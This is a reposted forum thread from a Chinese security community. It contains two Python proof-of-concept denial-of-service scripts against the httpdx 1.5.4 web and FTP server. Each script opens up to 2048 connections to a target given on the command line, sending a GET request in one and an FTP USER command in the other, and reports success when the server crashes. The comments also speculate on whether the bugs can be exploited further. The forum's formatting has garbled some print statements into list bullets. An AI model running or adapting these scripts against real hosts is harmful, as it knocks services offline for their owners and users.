首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 二进制漏洞
    3. 发新帖
[转帖]Httpdx 1.5.4 multiple DoS (http-ftp) PoC
2010-8-19 06:16 3499

[转帖]Httpdx 1.5.4 multiple DoS (http-ftp) PoC

freebsdlin 活跃值
2010-8-19 06:16
3499
#!/usr/bin/env python  

   

###########################################################################  

#  

# Title:    httpdx v1.5.4 Remote HTTP Server DoS (0day)  

# By:       Dr_IDE  

# Tested:   XPSP3  

# Download: http://httpdx.sourceforge.net  

# Note:     Server will totally crash if only running the EXE  

# Note:     Get a "ffs what happened?" message if running via BAT  

#  

############################################################################  

#  

# Debugging Notes: This may not be exploitable as it dumps on a read operation.   

# Upon crash throws: Access violation when reading [00001238]  

#  

############################################################################  

   

import socket, sys  

   

payload = ("GET / HTTP/1.1\r\n\r\n");  

x=1;  

   

try:  

    while (x < 2048):  

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

        print ("
  • Connecting to httpdx server.");  

    •         s.connect((sys.argv[1], 80));  

            print ("\n
  • Sending command.\n");  

    •         s.send(payload);  

            s.close();  

            x = x+1;  

       

    except:  

        print ("
  • Success! We crashed the server in %d attempts." % x);  

    •     print ("[i] [pocoftheday.blogspot.com]");  

       

       

    =====================================================================================

       

    #!/usr/bin/env python  

       

    ###########################################################################  

    #  

    # Title:    httpdx v1.5.4 Remote FTP Server DoS (0day)  

    # By:       Dr_IDE  

    # Tested:   XPSP3  

    # Download: http://httpdx.sourceforge.net  

    # Note:     Server will totally crash if only running the EXE  

    # Note:     Get a "ffs what happened?" message if running via BAT  

    #  

    ############################################################################  

    #  

    # Debugging Notes: This may be exploitable as it dumps on a write operation.   

    # Upon crash throws: Access violation when writing to [00230000]  

    #  

    ############################################################################  

       

    import socket, sys  

       

    payload = ("USER anonymous\r\n\r\n");  

    x=1;  

       

    try:  

        while (x < 2048):  

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  

            print ("
  • Connecting to httpdx server.");  

    •         s.connect((sys.argv[1], 21));  

            print ("\n
  • Sending command.\n");  

    •         s.send(payload);  

            s.close();  

            x = x+1;  

       

    except:  

        print ("
  • Success! We crashed the server in %d attempts." % x);  

    •     print ("[i] [pocoftheday.blogspot.com]");

    [培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

    收藏
    点赞0
    打赏
    分享
    最新回复 (0)
    游客
    登录 | 注册 方可回帖
     回帖  表情 雪币赚取及消费
    高级回复
    返回